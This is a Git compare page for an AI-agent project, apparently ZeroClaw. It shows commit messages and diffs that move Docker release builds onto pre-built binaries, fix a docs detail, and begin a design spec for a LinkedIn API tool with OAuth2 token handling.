Compare commits

...

12 Commits

Author SHA1 Message Date
argenis de la rosa d41715b95e merge: resolve conflict with master in release workflow
Accept master's version of release-beta-on-push.yml which uses
pre-built binary artifacts instead of QEMU-based compilation.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-17 10:11:48 -04:00
argenis de la rosa b571cf4c81 feat(heartbeat): add structured task prompt, delivery formatting, and comprehensive edge-case tests
Replace the flat heartbeat prompt with a structured, non-conversational
prompt (build_task_prompt) that instructs tool usage and structured output.
Add format_delivery_output to prepend headers, handle empty output, and
truncate for channel safety. Wire allowed_tools config into the agent call.

Add ~85 edge-case tests across engine, store, and daemon covering malformed
metadata parsing, decision response parsing, metrics edge cases, adaptive
interval boundaries, store truncation/ordering, and delivery resolution.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-17 09:29:40 -04:00
Alix-007 3cf873ab85 fix(groq): fall back on tool validation 400s (#3778)
Co-authored-by: Alix-007 <267018309+Alix-007@users.noreply.github.com>
Co-authored-by: Argenis <theonlyhennygod@gmail.com>
2026-03-17 09:23:39 -04:00
Argenis 025724913d feat(runtime): add configurable reasoning effort (#3785)
* feat(runtime): add configurable reasoning effort

* fix(test): add missing reasoning_effort field in live test

Add reasoning_effort: None to ProviderRuntimeOptions construction in
openai_codex_vision_e2e.rs to fix E0063 compile error.

---------

Co-authored-by: Alix-007 <267018309+Alix-007@users.noreply.github.com>
2026-03-17 09:21:53 -04:00
project516 49dd4cd9da Change AppImage to tar.gz in arduino-uno-q-setup.md (#3754)
Arduino App Lab is a tar.gz file for Linux, not an AppImage

Co-authored-by: Argenis <theonlyhennygod@gmail.com>
2026-03-17 09:19:38 -04:00
dependabot[bot] 0664a5e854 chore(deps): bump rust from 7d37016 to da9dab7 (#3776)
Bumps rust from `7d37016` to `da9dab7`.

---
updated-dependencies:
- dependency-name: rust
  dependency-version: 1.94-slim
  dependency-type: direct:production
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Co-authored-by: Argenis <theonlyhennygod@gmail.com>
2026-03-17 09:16:21 -04:00
argenis de la rosa 22c271e21d fix(ci): skip Rust compilation in Docker by reusing matrix build artifacts
The multi-platform Docker build (linux/amd64 + linux/arm64) was compiling
Rust from source inside QEMU, taking 60+ minutes and frequently getting
cancelled. The matrix build job already produces native binaries for both
architectures — this change makes the Docker job use those pre-built
binaries instead.

Adds ARG PREBUILT_BINARY gating to Dockerfile and Dockerfile.debian so
CI skips cargo build and copies from a named build context, while local
docker build remains unchanged. Timeout reduced from 60 to 15 minutes.
2026-03-17 09:09:54 -04:00
Argenis acd09fbd86 feat(ci): use pre-built binaries for Docker images (#3784)
Instead of compiling Rust from source inside Docker (~60 min),
download the already-built linux binaries from the build matrix
and copy them into a minimal distroless image (~2 min).

- Add Dockerfile.ci for release workflows (no Rust toolchain needed)
- Update both beta and stable workflows to use pre-built artifacts
- Drop Docker job timeout from 60 to 15 minutes
- Original Dockerfile unchanged for local dev builds
2026-03-17 09:03:13 -04:00
Alix-007 0f7d1fceeb fix(channels): hide tool-call notifications by default (#3779)
Co-authored-by: Alix-007 <267018309+Alix-007@users.noreply.github.com>
Co-authored-by: Argenis <theonlyhennygod@gmail.com>
2026-03-17 08:52:49 -04:00
GhostC 01e13ac92d fix(skills): allow sibling markdown links within skills root (#3781)
Made-with: Cursor
2026-03-17 08:31:20 -04:00
Argenis a9a6113093 fix(docs): revert unauthorized CLAUDE.md additions from #3604 (#3761)
PR #3604 included CLAUDE.md changes referencing non-existent modules
(src/security/taint.rs, src/sop/workflow.rs) and duplicating content
from CONTRIBUTING.md. These additions violate the anti-pattern rule
against modifying CLAUDE.md in feature PRs.
2026-03-17 01:56:51 -04:00
Giulio V 906951a587 feat(multi): LinkedIn tool, WhatsApp voice notes, and Anthropic OAuth fix (#3604)
* feat(tools): add native LinkedIn integration tool

Add a config-gated LinkedIn tool that enables ZeroClaw to interact with
LinkedIn's REST API via OAuth2. Supports creating posts, listing own
posts, commenting, reacting, deleting posts, viewing engagement stats,
and retrieving profile info.

Architecture:
- linkedin.rs: Tool trait impl with action-dispatched design
- linkedin_client.rs: OAuth2 token management and API wrappers
- Config-gated via [linkedin] enabled = false (default off)
- Credentials loaded from workspace .env file
- Automatic token refresh with line-targeted .env update

39 unit tests covering security enforcement, parameter validation,
credential parsing, and token management.

* feat(linkedin): configurable content strategy and API version

- Expand LinkedInConfig with api_version and nested LinkedInContentConfig
  (rss_feeds, github_users, github_repos, topics, persona, instructions)
- Add get_content_strategy tool action so agents can read config at runtime
- Fix hardcoded LinkedIn API version 202402 (expired) → configurable,
  defaulting to 202602
- LinkedInClient accepts api_version as parameter instead of static header
- 4 new tests (43 total), all passing

* feat(linkedin): add multi-provider image generation for posts

Add ImageGenerator with provider chain (DALL-E, Stability AI, Imagen, Flux)
and SVG fallback card. LinkedIn tool create_post now supports generate_image
parameter. Includes LinkedIn image upload (register → upload → reference),
configurable provider priority, and 14 new tests.

* feat(whatsapp): add voice note transcription and TTS voice replies

- Add STT support: download incoming voice notes via wa-rs, transcribe
  with OpenAI Whisper (or Groq), send transcribed text to agent
- Add TTS support: synthesize agent replies to Opus audio via OpenAI
  TTS, upload encrypted media, send as WhatsApp voice note (ptt=true)
- Voice replies only trigger when user sends a voice note; text
  messages get text replies only. Flag is consumed after one use to
  prevent multiple voice notes per agent turn
- Fix transcription module to support OpenAI API key (not just Groq):
  auto-detect provider from API URL, check ANTHROPIC_OAUTH_TOKEN /
  OPENAI_API_KEY / GROQ_API_KEY env vars in priority order
- Add optional api_key field to TranscriptionConfig for explicit key
- Add response_format: opus to OpenAI TTS for WhatsApp compatibility
- Add channel capability note so agent knows TTS is automatic
- Wire transcription + TTS config into WhatsApp Web channel builder

* fix(providers): prefer ANTHROPIC_OAUTH_TOKEN over global api_key

When the Anthropic provider is used alongside a non-Anthropic primary
provider (e.g. custom: gateway), the global api_key would be passed
as credential override, bypassing provider-specific env vars. This
caused Claude Code subscription tokens (sk-ant-oat01-*) to be ignored
in favor of the unrelated gateway JWT.

Fix: for the anthropic provider, check ANTHROPIC_OAUTH_TOKEN and
ANTHROPIC_API_KEY env vars before falling back to the credential
override. This mirrors the existing MiniMax OAuth pattern and enables
subscription-based auth to work as a fallback provider.

* feat(linkedin): add scheduled post support via LinkedIn API

Add scheduled_at parameter to create_post and create_post_with_image.
When provided (RFC 3339 timestamp), the post is created as a DRAFT
with scheduledPublishOptions so LinkedIn publishes it automatically
at the specified time. This enables the cron job to schedule a week
of posts in advance directly on LinkedIn.

* fix(providers): prefer env vars for openai and groq credential resolution

Generalize the Anthropic OAuth fix to also cover openai and groq
providers. When used alongside a non-matching primary provider (e.g.
a custom: gateway), the global api_key would be passed as credential
override, causing auth failures. Now checks provider-specific env
vars (OPENAI_API_KEY, GROQ_API_KEY) before falling back to the
credential override.

* fix(whatsapp): debounce voice replies to voice final answer only

The voice note TTS was triggering on the first send() call, which was
often intermediate tool output (URLs, JSON, web fetch results) rather
than the actual answer. This produced incomprehensible voice notes.

Fix: accumulate substantive replies (>30 chars, not URLs/JSON/code)
in a pending_voice map. A spawned debounce task waits 4 seconds after
the last substantive message, then synthesizes and sends ONE voice
note with the final answer. Intermediate tool outputs are skipped.

This ensures the user hears the actual answer in the correct language,
not raw tool output in English.

* fix(whatsapp): voice in = voice out, text in = text out

Rewrite voice reply logic with clean separation:
- Voice note received: ALL text output suppressed. Latest message
  accumulated silently. After 5s of no new messages, ONE voice note
  sent with the final answer. No tool outputs, no text, just voice.
- Text received: normal text reply, no voice.

Atomic debounce: multiple spawned tasks race but only one can extract
the pending message (remove-inside-lock pattern). Prevents duplicate
voice notes.
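The remove-inside-lock pattern described here can be sketched roughly like this (names such as `take_pending` are illustrative, not the actual code):

```rust
use std::collections::HashMap;
use std::sync::{Arc, Mutex};

/// Remove-inside-lock sketch: several racing debounce tasks may all call
/// this, but `HashMap::remove` under the lock guarantees at most one of
/// them receives `Some`, so only one voice note is synthesized per answer.
fn take_pending(pending: &Arc<Mutex<HashMap<String, String>>>, chat: &str) -> Option<String> {
    pending.lock().unwrap().remove(chat)
}
```

Any task that gets `None` simply exits; no separate flag or second lock is needed.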

* fix(whatsapp): voice replies send both text and voice note

Voice note in → text replies sent normally in real-time PLUS one
voice note with the final answer after 10s debounce. Only substantive
natural-language messages are voiced (tool outputs, URLs, JSON, code
blocks filtered out). Longer debounce (10s) ensures the agent
completes its full tool chain before the voice note fires.

Text in → text out only, no voice.

* fix(channels): suppress tool narration and ack reactions

- Add system prompt instruction telling the agent to NEVER narrate
  tool usage (no "Let me fetch..." or "I will use http_request...")
- Disable ack_reactions (emoji reactions on incoming messages)
- Users see only the final answer, no intermediate steps

* docs(claude): add full CONTRIBUTING.md guidelines to CLAUDE.md

Add PR template requirements, code naming conventions, architecture
boundary rules, validation commands, and branch naming guidance
directly to CLAUDE.md for AI assistant reference.

* fix(docs): add blank lines around headings in CLAUDE.md for markdown lint

* fix(channels): strengthen tool narration suppression and fix large_futures

- Move anti-narration instruction to top of channel system prompt
- Add emphatic instruction for WhatsApp/voice channels specifically
- Add outbound message filter to strip tool-call-like patterns (, 🔧)
- Box::pin the two-phase heartbeat agent::run call (16664 bytes on Linux)
2026-03-17 01:55:05 -04:00
27 changed files with 5383 additions and 159 deletions
+35 -4
@@ -294,10 +294,43 @@ jobs:
name: Push Docker Image
needs: [version, build]
runs-on: ubuntu-latest
timeout-minutes: 60
timeout-minutes: 15
steps:
- uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
- uses: actions/download-artifact@d3f86a106a0bac45b974a628896c90dbdf5c8093 # v4
with:
name: zeroclaw-x86_64-unknown-linux-gnu
path: artifacts/
- uses: actions/download-artifact@d3f86a106a0bac45b974a628896c90dbdf5c8093 # v4
with:
name: zeroclaw-aarch64-unknown-linux-gnu
path: artifacts/
- name: Prepare Docker context with pre-built binaries
run: |
mkdir -p docker-ctx/bin/amd64 docker-ctx/bin/arm64
tar xzf artifacts/zeroclaw-x86_64-unknown-linux-gnu.tar.gz -C docker-ctx/bin/amd64
tar xzf artifacts/zeroclaw-aarch64-unknown-linux-gnu.tar.gz -C docker-ctx/bin/arm64
mkdir -p docker-ctx/zeroclaw-data/.zeroclaw docker-ctx/zeroclaw-data/workspace
printf '%s\n' \
'workspace_dir = "/zeroclaw-data/workspace"' \
'config_path = "/zeroclaw-data/.zeroclaw/config.toml"' \
'api_key = ""' \
'default_provider = "openrouter"' \
'default_model = "anthropic/claude-sonnet-4-20250514"' \
'default_temperature = 0.7' \
'' \
'[gateway]' \
'port = 42617' \
'host = "[::]"' \
'allow_public_bind = true' \
> docker-ctx/zeroclaw-data/.zeroclaw/config.toml
cp Dockerfile.ci docker-ctx/Dockerfile
- uses: docker/setup-buildx-action@8d2750c68a42422c14e847fe6c8ac0403b4cbd6f # v3
- uses: docker/login-action@c94ce9fb468520275223c153574b00df6fe4bcc9 # v3
@@ -309,14 +342,12 @@ jobs:
- name: Build and push
uses: docker/build-push-action@10e90e3645eae34f1e60eeb005ba3a3d33f178e8 # v6
with:
context: .
context: docker-ctx
push: true
tags: |
${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:${{ needs.version.outputs.tag }}
${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:beta
platforms: linux/amd64,linux/arm64
cache-from: type=gha
cache-to: type=gha,mode=max
# ── Post-publish: tweet after release + website are live ──────────────
# Docker is slow (multi-platform) and can be cancelled by concurrency;
+35 -4
@@ -337,10 +337,43 @@ jobs:
name: Push Docker Image
needs: [validate, build]
runs-on: ubuntu-latest
timeout-minutes: 60
timeout-minutes: 15
steps:
- uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
- uses: actions/download-artifact@d3f86a106a0bac45b974a628896c90dbdf5c8093 # v4
with:
name: zeroclaw-x86_64-unknown-linux-gnu
path: artifacts/
- uses: actions/download-artifact@d3f86a106a0bac45b974a628896c90dbdf5c8093 # v4
with:
name: zeroclaw-aarch64-unknown-linux-gnu
path: artifacts/
- name: Prepare Docker context with pre-built binaries
run: |
mkdir -p docker-ctx/bin/amd64 docker-ctx/bin/arm64
tar xzf artifacts/zeroclaw-x86_64-unknown-linux-gnu.tar.gz -C docker-ctx/bin/amd64
tar xzf artifacts/zeroclaw-aarch64-unknown-linux-gnu.tar.gz -C docker-ctx/bin/arm64
mkdir -p docker-ctx/zeroclaw-data/.zeroclaw docker-ctx/zeroclaw-data/workspace
printf '%s\n' \
'workspace_dir = "/zeroclaw-data/workspace"' \
'config_path = "/zeroclaw-data/.zeroclaw/config.toml"' \
'api_key = ""' \
'default_provider = "openrouter"' \
'default_model = "anthropic/claude-sonnet-4-20250514"' \
'default_temperature = 0.7' \
'' \
'[gateway]' \
'port = 42617' \
'host = "[::]"' \
'allow_public_bind = true' \
> docker-ctx/zeroclaw-data/.zeroclaw/config.toml
cp Dockerfile.ci docker-ctx/Dockerfile
- uses: docker/setup-buildx-action@8d2750c68a42422c14e847fe6c8ac0403b4cbd6f # v3
- uses: docker/login-action@c94ce9fb468520275223c153574b00df6fe4bcc9 # v3
@@ -352,14 +385,12 @@ jobs:
- name: Build and push
uses: docker/build-push-action@10e90e3645eae34f1e60eeb005ba3a3d33f178e8 # v6
with:
context: .
context: docker-ctx
push: true
tags: |
${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:${{ needs.validate.outputs.tag }}
${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:latest
platforms: linux/amd64,linux/arm64
cache-from: type=gha
cache-to: type=gha,mode=max
# ── Post-publish: package manager auto-sync ─────────────────────────
scoop:
+33 -15
@@ -1,7 +1,13 @@
# syntax=docker/dockerfile:1.7
# Pre-built CI binaries context (empty locally; overridden via --build-context in CI)
FROM scratch AS ci-binaries
# ── Stage 1: Build ────────────────────────────────────────────
FROM rust:1.94-slim@sha256:7d3701660d2aa7101811ba0c54920021452aa60e5bae073b79c2b137a432b2f4 AS builder
FROM rust:1.94-slim@sha256:da9dab7a6b8dd428e71718402e97207bb3e54167d37b5708616050b1e8f60ed6 AS builder
ARG PREBUILT_BINARY=""
ARG TARGETARCH
WORKDIR /app
@@ -16,16 +22,22 @@ RUN --mount=type=cache,target=/var/cache/apt,sharing=locked \
COPY Cargo.toml Cargo.lock ./
COPY crates/robot-kit/Cargo.toml crates/robot-kit/Cargo.toml
# Create dummy targets declared in Cargo.toml so manifest parsing succeeds.
RUN mkdir -p src benches crates/robot-kit/src \
&& echo "fn main() {}" > src/main.rs \
&& echo "" > src/lib.rs \
&& echo "fn main() {}" > benches/agent_benchmarks.rs \
&& echo "pub fn placeholder() {}" > crates/robot-kit/src/lib.rs
RUN if [ -z "$PREBUILT_BINARY" ]; then \
mkdir -p src benches crates/robot-kit/src && \
echo "fn main() {}" > src/main.rs && \
echo "" > src/lib.rs && \
echo "fn main() {}" > benches/agent_benchmarks.rs && \
echo "pub fn placeholder() {}" > crates/robot-kit/src/lib.rs; \
fi
RUN --mount=type=cache,id=zeroclaw-cargo-registry,target=/usr/local/cargo/registry,sharing=locked \
--mount=type=cache,id=zeroclaw-cargo-git,target=/usr/local/cargo/git,sharing=locked \
--mount=type=cache,id=zeroclaw-target,target=/app/target,sharing=locked \
cargo build --release --locked
RUN rm -rf src benches crates/robot-kit/src
if [ -z "$PREBUILT_BINARY" ]; then \
cargo build --release --locked; \
fi
RUN if [ -z "$PREBUILT_BINARY" ]; then \
rm -rf src benches crates/robot-kit/src; \
fi
# 2. Copy only build-relevant source paths (avoid cache-busting on docs/tests/scripts)
COPY src/ src/
@@ -51,16 +63,22 @@ RUN mkdir -p web/dist && \
' </body>' \
'</html>' > web/dist/index.html; \
fi
RUN touch src/main.rs
RUN if [ -z "$PREBUILT_BINARY" ]; then touch src/main.rs; fi
RUN --mount=type=cache,id=zeroclaw-cargo-registry,target=/usr/local/cargo/registry,sharing=locked \
--mount=type=cache,id=zeroclaw-cargo-git,target=/usr/local/cargo/git,sharing=locked \
--mount=type=cache,id=zeroclaw-target,target=/app/target,sharing=locked \
rm -rf target/release/.fingerprint/zeroclawlabs-* \
target/release/deps/zeroclawlabs-* \
target/release/incremental/zeroclawlabs-* && \
cargo build --release --locked && \
cp target/release/zeroclaw /app/zeroclaw && \
strip /app/zeroclaw
--mount=from=ci-binaries,target=/ci-bin \
if [ -z "$PREBUILT_BINARY" ]; then \
rm -rf target/release/.fingerprint/zeroclawlabs-* \
target/release/deps/zeroclawlabs-* \
target/release/incremental/zeroclawlabs-* && \
cargo build --release --locked && \
cp target/release/zeroclaw /app/zeroclaw && \
strip /app/zeroclaw; \
else \
cp "/ci-bin/${TARGETARCH}/zeroclaw" /app/zeroclaw && \
strip /app/zeroclaw; \
fi
RUN size=$(stat -c%s /app/zeroclaw 2>/dev/null || stat -f%z /app/zeroclaw) && \
if [ "$size" -lt 1000000 ]; then echo "ERROR: binary too small (${size} bytes), likely dummy build artifact" && exit 1; fi
+25
@@ -0,0 +1,25 @@
# Dockerfile.ci — CI/release image using pre-built binaries.
# Used by release workflows to skip the ~60 min Rust compilation.
# The main Dockerfile is still used for local dev builds.
# ── Runtime (Distroless) ─────────────────────────────────────
FROM gcr.io/distroless/cc-debian13:nonroot@sha256:84fcd3c223b144b0cb6edc5ecc75641819842a9679a3a58fd6294bec47532bf7
ARG TARGETARCH
# Copy the pre-built binary for this platform (amd64 or arm64)
COPY bin/${TARGETARCH}/zeroclaw /usr/local/bin/zeroclaw
# Runtime directory structure and default config
COPY --chown=65534:65534 zeroclaw-data/ /zeroclaw-data/
ENV LANG=C.UTF-8
ENV ZEROCLAW_WORKSPACE=/zeroclaw-data/workspace
ENV HOME=/zeroclaw-data
ENV ZEROCLAW_GATEWAY_PORT=42617
WORKDIR /zeroclaw-data
USER 65534:65534
EXPOSE 42617
ENTRYPOINT ["zeroclaw"]
CMD ["gateway"]
+30 -12
@@ -15,8 +15,14 @@
# Or with docker compose:
# docker compose -f docker-compose.yml -f docker-compose.debian.yml up
# Pre-built CI binaries context (empty locally; overridden via --build-context in CI)
FROM scratch AS ci-binaries
# ── Stage 1: Build (identical to main Dockerfile) ───────────
FROM rust:1.94-slim@sha256:7d3701660d2aa7101811ba0c54920021452aa60e5bae073b79c2b137a432b2f4 AS builder
FROM rust:1.94-slim@sha256:da9dab7a6b8dd428e71718402e97207bb3e54167d37b5708616050b1e8f60ed6 AS builder
ARG PREBUILT_BINARY=""
ARG TARGETARCH
WORKDIR /app
@@ -31,16 +37,22 @@ RUN --mount=type=cache,target=/var/cache/apt,sharing=locked \
COPY Cargo.toml Cargo.lock ./
COPY crates/robot-kit/Cargo.toml crates/robot-kit/Cargo.toml
# Create dummy targets declared in Cargo.toml so manifest parsing succeeds.
RUN mkdir -p src benches crates/robot-kit/src \
&& echo "fn main() {}" > src/main.rs \
&& echo "" > src/lib.rs \
&& echo "fn main() {}" > benches/agent_benchmarks.rs \
&& echo "pub fn placeholder() {}" > crates/robot-kit/src/lib.rs
RUN if [ -z "$PREBUILT_BINARY" ]; then \
mkdir -p src benches crates/robot-kit/src && \
echo "fn main() {}" > src/main.rs && \
echo "" > src/lib.rs && \
echo "fn main() {}" > benches/agent_benchmarks.rs && \
echo "pub fn placeholder() {}" > crates/robot-kit/src/lib.rs; \
fi
RUN --mount=type=cache,id=zeroclaw-cargo-registry,target=/usr/local/cargo/registry,sharing=locked \
--mount=type=cache,id=zeroclaw-cargo-git,target=/usr/local/cargo/git,sharing=locked \
--mount=type=cache,id=zeroclaw-target,target=/app/target,sharing=locked \
cargo build --release --locked
RUN rm -rf src benches crates/robot-kit/src
if [ -z "$PREBUILT_BINARY" ]; then \
cargo build --release --locked; \
fi
RUN if [ -z "$PREBUILT_BINARY" ]; then \
rm -rf src benches crates/robot-kit/src; \
fi
# 2. Copy only build-relevant source paths (avoid cache-busting on docs/tests/scripts)
COPY src/ src/
@@ -65,13 +77,19 @@ RUN mkdir -p web/dist && \
' </body>' \
'</html>' > web/dist/index.html; \
fi
RUN touch src/main.rs
RUN if [ -z "$PREBUILT_BINARY" ]; then touch src/main.rs; fi
RUN --mount=type=cache,id=zeroclaw-cargo-registry,target=/usr/local/cargo/registry,sharing=locked \
--mount=type=cache,id=zeroclaw-cargo-git,target=/usr/local/cargo/git,sharing=locked \
--mount=type=cache,id=zeroclaw-target,target=/app/target,sharing=locked \
cargo build --release --locked && \
cp target/release/zeroclaw /app/zeroclaw && \
strip /app/zeroclaw
--mount=from=ci-binaries,target=/ci-bin \
if [ -z "$PREBUILT_BINARY" ]; then \
cargo build --release --locked && \
cp target/release/zeroclaw /app/zeroclaw && \
strip /app/zeroclaw; \
else \
cp "/ci-bin/${TARGETARCH}/zeroclaw" /app/zeroclaw && \
strip /app/zeroclaw; \
fi
RUN size=$(stat -c%s /app/zeroclaw 2>/dev/null || stat -f%z /app/zeroclaw) && \
if [ "$size" -lt 1000000 ]; then echo "ERROR: binary too small (${size} bytes), likely dummy build artifact" && exit 1; fi
+1 -1
@@ -31,7 +31,7 @@ Build with `--features hardware` to include Uno Q support.
### 1.1 Configure Uno Q via App Lab
1. Download [Arduino App Lab](https://docs.arduino.cc/software/app-lab/) (AppImage on Linux).
1. Download [Arduino App Lab](https://docs.arduino.cc/software/app-lab/) (tar.gz on Linux).
2. Connect Uno Q via USB, power it on.
3. Open App Lab, connect to the board.
4. Follow the setup wizard:
@@ -0,0 +1,314 @@
# LinkedIn Tool — Design Spec
**Date:** 2026-03-13
**Status:** Approved
**Risk tier:** Medium (new tool, external API, credential handling)
## Summary
Native LinkedIn integration tool for ZeroClaw. Enables the agent to create posts,
list its own posts, comment, react, delete posts, view post engagement, and retrieve
profile info — all through LinkedIn's official REST API with OAuth2 authentication.
## Motivation
Enable ZeroClaw to autonomously publish LinkedIn content on a schedule (via cron),
drawing from the user's memory, project history, and Medium feed. Removes dependency
on third-party platforms like Composio for social media posting.
## Required OAuth2 scopes
Users must grant these scopes when creating their LinkedIn Developer App:
| Scope | Required for |
|---|---|
| `w_member_social` | `create_post`, `comment`, `react`, `delete_post` |
| `r_liteprofile` | `get_profile` |
| `r_member_social` | `list_posts`, `get_engagement` |
The "Share on LinkedIn" and "Sign In with LinkedIn using OpenID Connect" products
must be requested in the LinkedIn Developer App dashboard (both auto-approve).
## Architecture
### File structure
| File | Role |
|---|---|
| `src/tools/linkedin.rs` | `Tool` trait impl, action dispatch, parameter validation |
| `src/tools/linkedin_client.rs` | OAuth2 token management, LinkedIn REST API wrappers |
| `src/tools/mod.rs` | Module declaration, pub use, registration in `all_tools_with_runtime` |
| `src/config/schema.rs` | `[linkedin]` config section (`LinkedInConfig`) |
| `src/config/mod.rs` | Add `LinkedInConfig` to pub use exports |
### No new dependencies
All required crates are already in `Cargo.toml`: `reqwest` (HTTP), `serde`/`serde_json`
(serialization), `chrono` (timestamps), `tokio` (async fs for .env reading).
## Config
### `config.toml`
```toml
[linkedin]
enabled = false
```
### `.env` credentials
```bash
LINKEDIN_CLIENT_ID=your_client_id
LINKEDIN_CLIENT_SECRET=your_client_secret
LINKEDIN_ACCESS_TOKEN=your_access_token
LINKEDIN_REFRESH_TOKEN=your_refresh_token
LINKEDIN_PERSON_ID=your_person_urn_id
```
Token format: `LINKEDIN_PERSON_ID` is the bare ID (e.g., `dXNlcjpA...`), not the
full URN. The client prefixes `urn:li:person:` internally.
## Tool design
### Single tool, action-dispatched
Tool name: `linkedin`
The LLM calls it with an `action` field and action-specific parameters:
```json
{ "action": "create_post", "text": "...", "visibility": "PUBLIC" }
```
### Actions
| Action | Params | API | Write? |
|---|---|---|---|
| `create_post` | `text`, `visibility?` (PUBLIC/CONNECTIONS, default PUBLIC), `article_url?`, `article_title?` | `POST /rest/posts` | Yes |
| `list_posts` | `count?` (default 10, max 50) | `GET /rest/posts?author={personUrn}&q=author` | No |
| `comment` | `post_id`, `text` | `POST /rest/socialActions/{id}/comments` | Yes |
| `react` | `post_id`, `reaction_type` (LIKE/CELEBRATE/SUPPORT/LOVE/INSIGHTFUL/FUNNY) | `POST /rest/reactions?actor={actorUrn}` | Yes |
| `delete_post` | `post_id` | `DELETE /rest/posts/{id}` | Yes |
| `get_engagement` | `post_id` | `GET /rest/socialActions/{id}` | No |
| `get_profile` | (none) | `GET /rest/me` | No |
Note: `list_posts` queries posts authored by the authenticated user (not a home feed —
LinkedIn does not expose a home feed API). `get_engagement` returns likes/comments/shares
counts for a specific post via the socialActions endpoint.
### Security enforcement
- Write actions (`create_post`, `comment`, `react`, `delete_post`): check `security.can_act()` + `security.record_action()`
- Read actions (`list_posts`, `get_engagement`, `get_profile`): still call `record_action()` for rate tracking
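The write/read split above can be expressed as a single predicate; this is a sketch of the classification only (the `security` handle itself comes from the existing tools module and is not shown):

```rust
/// Which LinkedIn actions mutate state. Per the spec, write actions must
/// pass `security.can_act()` before executing; every action, read or
/// write, is then logged via `security.record_action()`.
fn is_write_action(action: &str) -> bool {
    matches!(action, "create_post" | "comment" | "react" | "delete_post")
}
```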
### Parameter validation
- `article_title` without `article_url` returns error: "article_title requires article_url"
- `react` requires both `post_id` and `reaction_type`
- `comment` requires both `post_id` and `text`
- `create_post` requires `text` (non-empty)
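The rules above, collected into one standalone check (a sketch; the real validation lives inside the action dispatch in `linkedin.rs`):

```rust
/// Validate action parameters per the spec's rules. Returns the error
/// strings listed in the Error handling section.
fn validate_params(
    action: &str,
    text: Option<&str>,
    post_id: Option<&str>,
    reaction_type: Option<&str>,
    article_url: Option<&str>,
    article_title: Option<&str>,
) -> Result<(), String> {
    // article_title is only meaningful alongside article_url
    if article_title.is_some() && article_url.is_none() {
        return Err("article_title requires article_url to be set".into());
    }
    match action {
        "create_post" if text.map_or(true, |t| t.trim().is_empty()) => {
            Err("create_post requires non-empty text".into())
        }
        "comment" if post_id.is_none() || text.is_none() => {
            Err("comment requires both post_id and text".into())
        }
        "react" if post_id.is_none() || reaction_type.is_none() => {
            Err("react requires both post_id and reaction_type".into())
        }
        _ => Ok(()),
    }
}
```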
### Parameter schema
```json
{
"type": "object",
"properties": {
"action": {
"type": "string",
"enum": ["create_post", "list_posts", "comment", "react", "delete_post", "get_engagement", "get_profile"],
"description": "The LinkedIn action to perform"
},
"text": {
"type": "string",
"description": "Post or comment text content"
},
"visibility": {
"type": "string",
"enum": ["PUBLIC", "CONNECTIONS"],
"description": "Post visibility (default: PUBLIC)"
},
"article_url": {
"type": "string",
"description": "URL to attach as article/link preview"
},
"article_title": {
"type": "string",
"description": "Title for the attached article (requires article_url)"
},
"post_id": {
"type": "string",
"description": "LinkedIn post URN for comment/react/delete/engagement"
},
"reaction_type": {
"type": "string",
"enum": ["LIKE", "CELEBRATE", "SUPPORT", "LOVE", "INSIGHTFUL", "FUNNY"],
"description": "Reaction type for the react action"
},
"count": {
"type": "integer",
"description": "Number of posts to retrieve (default 10, max 50)"
}
},
"required": ["action"]
}
```
## LinkedIn client
### `LinkedInClient` struct
```rust
pub struct LinkedInClient {
workspace_dir: PathBuf,
}
```
Uses `crate::config::build_runtime_proxy_client_with_timeouts("tool.linkedin", 30, 10)`
per request (same pattern as Pushover), respecting runtime proxy configuration.
### Credential loading
Same pattern as `PushoverTool`: reads `.env` from `workspace_dir`, parses key-value
pairs, supports `export` prefix and quoted values.
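A minimal sketch of that line format (illustration only; the shared parsing lives in the Pushover-style helper, and `parse_env_line` is a hypothetical name):

```rust
/// Parse one .env line: supports `export KEY=val`, single/double quoted
/// values, and skips comments and blank lines.
fn parse_env_line(line: &str) -> Option<(String, String)> {
    let line = line.trim();
    if line.is_empty() || line.starts_with('#') {
        return None;
    }
    let line = line.strip_prefix("export ").unwrap_or(line);
    let (key, value) = line.split_once('=')?;
    let value = value.trim().trim_matches('"').trim_matches('\'');
    Some((key.trim().to_string(), value.to_string()))
}
```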
### Token refresh
1. All API calls use `LINKEDIN_ACCESS_TOKEN` in `Authorization: Bearer` header
2. On 401 response, attempt token refresh:
- `POST https://www.linkedin.com/oauth/v2/accessToken`
- Body: `grant_type=refresh_token&refresh_token=...&client_id=...&client_secret=...`
3. On successful refresh, update `LINKEDIN_ACCESS_TOKEN` in `.env` file via
line-targeted replacement (read all lines, replace the matching key line, write back).
Preserves `export` prefixes, quoting style, comments, and all other keys.
4. Retry the original request once
5. If refresh also fails, return error with clear message about re-authentication
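Step 3's line-targeted replacement can be sketched as below. This is a simplified illustration (it preserves `export` prefixes and comments but, unlike the real implementation, does not preserve leading indentation or quoting style):

```rust
/// Replace the value of `key` in .env contents, touching only the
/// matching key line and leaving comments and other keys intact.
fn update_env_key(contents: &str, key: &str, new_value: &str) -> String {
    let needle = format!("{key}=");
    contents
        .lines()
        .map(|line| {
            let trimmed = line.trim_start();
            // Match both `KEY=...` and `export KEY=...`, skip comments.
            let body = trimmed.strip_prefix("export ").unwrap_or(trimmed);
            if body.starts_with(needle.as_str()) && !trimmed.starts_with('#') {
                let prefix = if trimmed.starts_with("export ") { "export " } else { "" };
                format!("{prefix}{key}={new_value}")
            } else {
                line.to_string()
            }
        })
        .collect::<Vec<_>>()
        .join("\n")
}
```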
### API versioning
All requests include:
- `LinkedIn-Version: 202402` header (stable version)
- `X-Restli-Protocol-Version: 2.0.0` header
- `Content-Type: application/json`
### React endpoint details
The `react` action sends:
- `POST /rest/reactions?actor=urn:li:person:{personId}`
- Body: `{"reactionType": "LIKE", "object": "urn:li:ugcPost:{postId}"}`
The actor URN is derived from `LINKEDIN_PERSON_ID` in `.env`.
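Putting the URN prefixing and body together (a sketch; the `api.linkedin.com` host is an assumption here, since the spec only gives the `/rest/...` paths):

```rust
/// Build the react request URL and JSON body from the bare person id
/// stored in .env, per the endpoint shape above.
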